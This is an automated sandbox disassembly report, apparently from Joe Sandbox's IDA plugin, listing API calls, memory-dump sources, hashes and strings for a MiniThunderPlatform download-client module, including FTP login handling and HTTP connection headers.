                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(server_is_valid), ref: 100BC28F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(resource), ref: 100BC2A3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100BC307
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100BC316
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(enable_p2s), ref: 100BC325
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(p2sp_task), ref: 100BC339
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100BC399
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100BC3A8
                                                                                                                                                • Part of subcall function 100BBDC0: RtlEnterCriticalSection.NTDLL(00000030), ref: 100BBDFC
                                                                                                                                                • Part of subcall function 100BBDC0: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?), ref: 100BBE40
                                                                                                                                                • Part of subcall function 100BBDC0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?), ref: 100BBE8D
                                                                                                                                                • Part of subcall function 100BBDC0: RtlLeaveCriticalSection.NTDLL(?), ref: 100BBE98
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$CriticalSection$??$?D@1@@std@@D@2@@0@0@EnterInitializeLeaveV?$basic_string@
                                                                                                                                              • String ID: enable_p2s$origin_is_valid$p2sp_task$resource$server_is_valid
                                                                                                                                              • API String ID: 2770638384-3993266642
                                                                                                                                              • Opcode ID: 5e91811906a0b5f364922efc9151a861048a4b0efd464c3dd44f1ad724318765
                                                                                                                                              • Instruction ID: db9c2fb473373ded5edf343f27464bff0627bb8ea1e581697a6ccc9d3ca3fb38
                                                                                                                                              • Opcode Fuzzy Hash: 5e91811906a0b5f364922efc9151a861048a4b0efd464c3dd44f1ad724318765
                                                                                                                                              • Instruction Fuzzy Hash: E09132751087819FD314CF68C988A5AFBE8FF98B00F508A4DF59A87261D770E948CF62
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D73F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D751
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1009D78E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D79F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(USER), ref: 1009D7AE
                                                                                                                                                • Part of subcall function 1009D410: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1009D446
                                                                                                                                                • Part of subcall function 1009D410: ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71 ref: 1009D45A
                                                                                                                                                • Part of subcall function 1009D410: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(1027E6E8), ref: 1009D470
                                                                                                                                                • Part of subcall function 1009D410: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1009D47B
                                                                                                                                                • Part of subcall function 1009D410: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(10277F04), ref: 1009D48A
                                                                                                                                                • Part of subcall function 1009D410: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,USER), ref: 1009D49C
                                                                                                                                                • Part of subcall function 1009D410: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(USER ******), ref: 1009D4AE
                                                                                                                                                • Part of subcall function 1009D410: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D4F6
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1009D7DB
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D7F3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D764
                                                                                                                                                • Part of subcall function 1000F130: _ultoa.MSVCR71 ref: 1000F157
                                                                                                                                                • Part of subcall function 1000F130: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1000F167
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D898
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D8AA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D8BD
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1009D8E7
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D8F8
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(USER), ref: 1009D907
                                                                                                                                                • Part of subcall function 1009C690: ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 1009C6A6
                                                                                                                                                • Part of subcall function 1009C690: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1009C6BA
                                                                                                                                                • Part of subcall function 10001482: __EH_prolog.LIBCMT ref: 10001487
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,10277ABC), ref: 1000149A
                                                                                                                                                • Part of subcall function 10001482: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 100014AB
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 100014B5
                                                                                                                                                • Part of subcall function 10001482: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100014C5
                                                                                                                                                • Part of subcall function 100013D0: __EH_prolog.LIBCMT ref: 100013D5
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100013E8
                                                                                                                                                • Part of subcall function 100013D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100013F9
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001403
                                                                                                                                                • Part of subcall function 100013D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001413
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$V01@@$?append@?$basic_string@V12@V12@@$D@1@@std@@D@2@@0@V01@V?$basic_string@Y?$basic_string@$??$?9H_prolog$??$?8_ultoa
                                                                                                                                              • String ID: USER$does not surpport this type of ftp proxy
                                                                                                                                              • API String ID: 4024142931-1749272867
                                                                                                                                              • Opcode ID: 085e6be74986b64f9ebece1658b85adc203d39fee804c1db71bfbb87166ee60d
                                                                                                                                              • Instruction ID: 2ac1d7485d66b6b993a45f71ba57bc011deb28e65f6a45df6d6d007a3af8f168
                                                                                                                                              • Opcode Fuzzy Hash: 085e6be74986b64f9ebece1658b85adc203d39fee804c1db71bfbb87166ee60d
                                                                                                                                              • Instruction Fuzzy Hash: A2611A750083C19FD335DB64C998BDFBBE8ABA9304F008A4EF59E92251DB746148CB63
                                                                                                                                              APIs
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?), ref: 1007C288
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 1007C29B
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?), ref: 1007C2B4
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C2C8
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 1007C2F3
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,?,102483D4,000000FF), ref: 1007C326
                                                                                                                                              • RtlDeleteCriticalSection.NTDLL ref: 1007C34B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C358
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C399
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C3AA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C3BB
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C3CC
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 1007C3DD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C402
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C413
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C424
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C435
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C446
                                                                                                                                                • Part of subcall function 10023953: __EH_prolog.LIBCMT ref: 10023958
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10023971
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002397E
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002398B
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10023998
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100239A5
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100239B1
                                                                                                                                                • Part of subcall function 10009F50: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400,00000026), ref: 10009F65
                                                                                                                                                • Part of subcall function 10009F50: ??3@YAXPAX@Z.MSVCR71(?,?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400), ref: 10009F76
                                                                                                                                              • RtlDeleteCriticalSection.NTDLL(?), ref: 1007C48D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C49A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007C4BA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??3@$CriticalDeleteSection$H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1009D446
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71 ref: 1009D45A
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(1027E6E8), ref: 1009D470
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1009D47B
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(10277F04), ref: 1009D48A
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,USER), ref: 1009D49C
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(USER ******), ref: 1009D4AE
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D4F6
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,PASS), ref: 1009D504
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(PASS ******), ref: 1009D516
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D5EE
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@D@1@@std@@D@2@@0@V?$basic_string@$??$?8??1?$basic_string@V01@Y?$basic_string@$??$?9?append@?$basic_string@V01@@V12@V12@@
                                                                                                                                              • String ID: .\ftp_data_pipe.cpp$PASS$PASS ******$USER$USER ******$data_len <= FTP_BUFFER_SIZE$thunder_assert
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10078178
                                                                                                                                                • Part of subcall function 100013D0: __EH_prolog.LIBCMT ref: 100013D5
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100013E8
                                                                                                                                                • Part of subcall function 100013D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100013F9
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001403
                                                                                                                                                • Part of subcall function 100013D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001413
                                                                                                                                                • Part of subcall function 10027330: FindFirstFileA.KERNEL32(?), ref: 1002735E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007829A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100782BB
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100782DC
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10078300
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10078324
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1007833E
                                                                                                                                              • ?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(?,FFFFFFFF,00000001), ref: 1007835F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(1027E260), ref: 10078384
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100783B0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100783C2
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(1027E25C), ref: 100783D4
                                                                                                                                              • ?insert@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@IABV12@@Z.MSVCP71(00000000,?), ref: 100783EA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10078400
                                                                                                                                                • Part of subcall function 1006EC10: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 1006EC5B
                                                                                                                                                • Part of subcall function 1006EC10: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 1006EC75
                                                                                                                                                • Part of subcall function 1006EC10: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(temp_file), ref: 1006EC8C
                                                                                                                                                • Part of subcall function 1006EC10: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006ECC5
                                                                                                                                                • Part of subcall function 1006EC10: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006ECD7
                                                                                                                                                • Part of subcall function 1006EC10: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006ECE9
                                                                                                                                                • Part of subcall function 1006EC10: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006ED12
                                                                                                                                                • Part of subcall function 10027330: FindClose.KERNEL32(00000000), ref: 10027381
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1007841D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10078439
                                                                                                                                                • Part of subcall function 1006EAE0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 1006EB2B
                                                                                                                                                • Part of subcall function 1006EAE0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 1006EB45
                                                                                                                                                • Part of subcall function 1006EAE0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(temp_file), ref: 1006EB5C
                                                                                                                                                • Part of subcall function 1006EAE0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006EB95
                                                                                                                                                • Part of subcall function 1006EAE0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006EBA7
                                                                                                                                                • Part of subcall function 1006EAE0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006EBB9
                                                                                                                                                • Part of subcall function 1006EAE0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006EBE2
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$V01@@V12@V12@@$?append@?$basic_string@Find$?assign@?$basic_string@?insert@?$basic_string@?rfind@?$basic_string@CloseFileFirstH_prologV01@Y?$basic_string@
                                                                                                                                              • String ID: .
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100942E4
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71( Keep-Alive), ref: 10094327
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Connection), ref: 100942B9
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,?,?,?,?,?,?,?,?,?,?,1027B92C,00000000,00000002), ref: 10093FB5
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10093FD4
                                                                                                                                                • Part of subcall function 10093F80: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?), ref: 10093FF5
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10094009
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009401B
                                                                                                                                              • ?find_first_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(HTTP/1.1,00000000,00000008), ref: 10094308
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Keep-Alive,?,?), ref: 1009435C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 100943A8
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100943C5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71( Close), ref: 100943E3
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Close,?,?), ref: 10094416
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10094460
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1009447A
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$V01@@$??$?8?find_first_of@?$basic_string@D@1@@std@@D@2@@0@0@V?$basic_string@
                                                                                                                                              • String ID: Close$ Keep-Alive$Close$Connection$HTTP/1.1$Keep-Alive
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1001D474
                                                                                                                                                • Part of subcall function 1001694C: RtlEnterCriticalSection.NTDLL(?), ref: 1001695C
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1001D4D5
                                                                                                                                                • Part of subcall function 100184D9: __EH_prolog.LIBCMT ref: 100184DE
                                                                                                                                                • Part of subcall function 100184D9: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100184FB
